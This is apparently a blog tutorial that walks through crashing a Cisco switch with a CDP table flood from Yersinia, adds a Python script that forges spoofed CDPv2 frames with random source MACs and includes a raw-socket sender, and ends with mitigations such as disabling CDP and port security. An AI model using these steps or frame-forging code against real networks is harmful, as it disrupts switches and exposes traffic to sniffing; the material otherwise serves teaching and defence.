This is an easy Denial of Service (DoS) attack to launch. We’re going to use the Cisco Discovery Protocol (CDP) to bring a switch to its knees. It literally only took me 5 minutes to completely destroy this enterprise-class switch.
Watch, learn and be afraid.
Normally CDP is used by network engineers to view the network topology. For example, if you log into a switch and type:
show cdp neighbors
you’ll see directly connected devices that are also using CDP. It’s a basic verification tool.
I just cleared the CDP table on my switch, so mine is empty right now, but normally you’ll see useful data about the other devices on your network.
If I run show cdp traffic I can see there’s hardly anything going on: CDP activity is minimal.
But what happens if you start flooding my switch with thousands of CDP messages?
Destroying a Cisco switch with CDP flooding
Every CDP frame is a control-plane packet that the switch has to punt to its CPU, so a flood pins the CPU at 100%. That freezes the management plane, which effectively blocks anyone from managing the switch remotely (SSH and SNMP stop answering and even the console lags), and it starves the other processes that share that CPU, such as spanning tree, so the switch starts dropping the traffic it has to handle in software. But that’s not the only thing a CDP flood does.
Yersinia also spoofs a fresh source MAC on every frame it sends (MAC spoofing is on by default), so the flood fills the switch’s MAC address table at the same time. Once that table is full the switch can’t learn new addresses and has to flood unknown-unicast frames out all ports in the VLAN, just like a hub.
This means an attacker could fire up a protocol analyzer such as Wireshark and start sniffing and collecting sensitive data on your network. Why? Because normally a switch forwards a frame only to the port that owns the destination MAC, so a user capturing on switchport 2 sees only traffic addressed to switchport 2. Once the MAC address table is full the switch forwards those frames out every port, which makes it really easy for an intruder to see things he shouldn’t see.
So a CDP flood hits you twice: the overflowing MAC address table turns the switch into a hub, and the saturated CPU makes it drop the frames it still has to process in software.
Let’s look at the CPU before the attack:
show process cpu sorted | include CPU|PID Runtime|CDP Protocol
The output is showing us that for the past five seconds our CPU usage was a mere 0.08%.
Now let’s kick open Yersinia in Kali Linux and destroy the switch.
Click Launch attack in the upper left corner of the Yersinia GUI
In the CDP tab, pick flooding CDP table from the list.
Yersinia immediately starts pelting the switch with over 2000 CDP frames per second!
Now let’s return to the switch to see the damage we did.
show cdp neighbors now shows tens of thousands of bogus devices all originating from Yersinia.
This is very very very bad.
If you don’t believe me just look at the CPU on our switch.
Do you see that little part where it says CPU utilization for five seconds is 99%/100%?
Yup; the CPU is done.
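To make the flood from the Yersinia steps above and the tens of thousands of bogus neighbors concrete, here is an added example (my own code, not from the original post and not Yersinia’s). It builds CDPv2 frames with nothing but the Python standard library, shows why every flood frame costs the switch a new CDP-table entry and a new MAC-table entry, and includes a crude per-port detector you could run over a capture. The TLV set, the "Linux" platform string, the 180-second holdtime and the 8-neighbour threshold are my assumptions, not values from the post; send_frames only shows how you would transmit on Linux and is never called.

```python
# Added example (not from the original post or from Yersinia): what a CDP-table flood looks like
# on the wire, built with nothing but the Python standard library.
import random
import struct

CDP_DST_MAC = bytes.fromhex("01000ccccccc")   # multicast group every CDP frame is sent to
LLC_SNAP_CDP = b"\xaa\xaa\x03" + bytes.fromhex("00000c") + b"\x20\x00"  # SNAP, Cisco OUI, PID 0x2000
TLV_DEVICE_ID, TLV_PORT_ID, TLV_CAPABILITIES, TLV_PLATFORM = 0x0001, 0x0003, 0x0004, 0x0006
CAP_HOST = 0x10   # capabilities bit: "host"


def cdp_checksum(data: bytes) -> int:
    """Internet one's-complement checksum over the CDP header and TLVs (checksum field zeroed).

    Cisco handles odd-length packets in a quirky way, so build_cdp_frame keeps every packet
    even-length and the pad below is only a safety net.
    """
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def tlv(tlv_type: int, value: bytes) -> bytes:
    """CDP TLV: 2-byte type, 2-byte length (including the 4-byte header), then the value."""
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def build_cdp_frame(src_mac: bytes, device_id: str, port_id: str = "Ethernet0",
                    platform: str = "Linux", ttl: int = 180) -> bytes:
    """802.3 frame carrying a CDPv2 advertisement with the TLVs a switch needs to add a neighbour."""
    if (len(device_id) + len(port_id) + len(platform)) % 2:
        platform += " "   # keep the packet even-length (see cdp_checksum); assumed padding
    body = (tlv(TLV_DEVICE_ID, device_id.encode())
            + tlv(TLV_PORT_ID, port_id.encode())
            + tlv(TLV_CAPABILITIES, struct.pack("!I", CAP_HOST))
            + tlv(TLV_PLATFORM, platform.encode()))
    cdp = struct.pack("!BBH", 2, ttl, 0) + body            # version 2, holdtime, checksum placeholder
    cdp = cdp[:2] + struct.pack("!H", cdp_checksum(cdp)) + cdp[4:]
    payload = LLC_SNAP_CDP + cdp
    return CDP_DST_MAC + src_mac + struct.pack("!H", len(payload)) + payload   # 802.3 length field


def parse_cdp_frame(frame: bytes) -> dict:
    """Decode a CDP frame the way a switch must before it can add the entry (raises on junk)."""
    if frame[:6] != CDP_DST_MAC or frame[14:22] != LLC_SNAP_CDP:
        raise ValueError("not a CDP frame")
    length = struct.unpack("!H", frame[12:14])[0]
    cdp = frame[22:14 + length]
    version, ttl, checksum = struct.unpack("!BBH", cdp[:4])
    if cdp_checksum(cdp[:2] + b"\x00\x00" + cdp[4:]) != checksum:
        raise ValueError("bad CDP checksum")
    tlvs, off = {}, 4
    while off + 4 <= len(cdp):
        t, l = struct.unpack("!HH", cdp[off:off + 4])
        if l < 4 or off + l > len(cdp):
            raise ValueError("malformed TLV")
        tlvs[t] = cdp[off + 4:off + l]
        off += l
    return {"src_mac": frame[6:12], "version": version, "ttl": ttl, "tlvs": tlvs,
            "device_id": tlvs.get(TLV_DEVICE_ID, b"").decode(errors="replace")}


def flood_frames(count: int, seed: int = 1) -> list:
    """The flood: every frame carries a fresh Device ID *and* a fresh source MAC, so each one
    costs the switch a new CDP-table entry and a new MAC-table entry. Nothing is sent here."""
    rng = random.Random(seed)
    frames = []
    for i in range(count):
        mac = bytearray(rng.getrandbits(8) for _ in range(6))
        mac[0] = (mac[0] & 0xFE) | 0x02                        # unicast, locally administered
        device_id = "%04X%04X" % (i, rng.getrandbits(16))      # index prefix keeps IDs unique
        frames.append(build_cdp_frame(bytes(mac), device_id))
    return frames


def neighbours(frames) -> set:
    """Distinct (source MAC, Device ID) pairs: the entries 'show cdp neighbors' would grow by."""
    seen = set()
    for f in frames:
        try:
            p = parse_cdp_frame(f)
        except ValueError:
            continue
        seen.add((p["src_mac"], p["device_id"]))
    return seen


def is_flood(frames, max_neighbours: int = 8) -> bool:
    """Crude detector (threshold assumed): an access port has one or two CDP neighbours, never dozens."""
    return len(neighbours(frames)) > max_neighbours


def send_frames(frames, ifname: str) -> None:
    """Actually transmit (Linux, needs CAP_NET_RAW). Not called here; only aim it at a lab switch."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((ifname, 0))
        for f in frames:
            s.send(f)


if __name__ == "__main__":
    legit = build_cdp_frame(bytes.fromhex("001122334455"), "SW1", "Gi1/0/1", "cisco WS-C3750")
    print(parse_cdp_frame(legit)["device_id"], is_flood([legit] * 3))
    flood = flood_frames(2000)
    print(len(neighbours(flood)), is_flood(flood))
```

Two thousand frames in this list is what Yersinia pushes out in about one second, and because each one parses as a valid neighbour the switch has no cheap way to reject them; that is why the fix has to be not accepting CDP on that port at all, rather than something the CDP process can decide for itself.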
The Bottom Line
So how do you stop something like this? One way to shut down a CDP flood is to disable CDP on the entire switch:
config t
no cdp run
or you can turn it off only on the interfaces that don’t need it, which is usually the better choice, since disabling it globally also blinds you to your own uplinks (and Cisco IP phones rely on CDP to learn their voice VLAN):
config t
int gi3/0/1
no cdp enable
The other, more practical option is to enable port security on the switch. I explained how to do this in my article on DHCP starvation attacks. The idea is that you confine a switchport to a specific layer 2 MAC address (or a small number of them). Since Yersinia spoofs a different source MAC on every frame, the first forged frame trips the port’s violation mode and the port is shut down before the flood gets going. Note that port security does nothing about CDP frames sent from the permitted MAC, so on user-facing ports pair it with no cdp enable.
What do you think about this? Have you ever seen someone fry a switch with a CDP flood?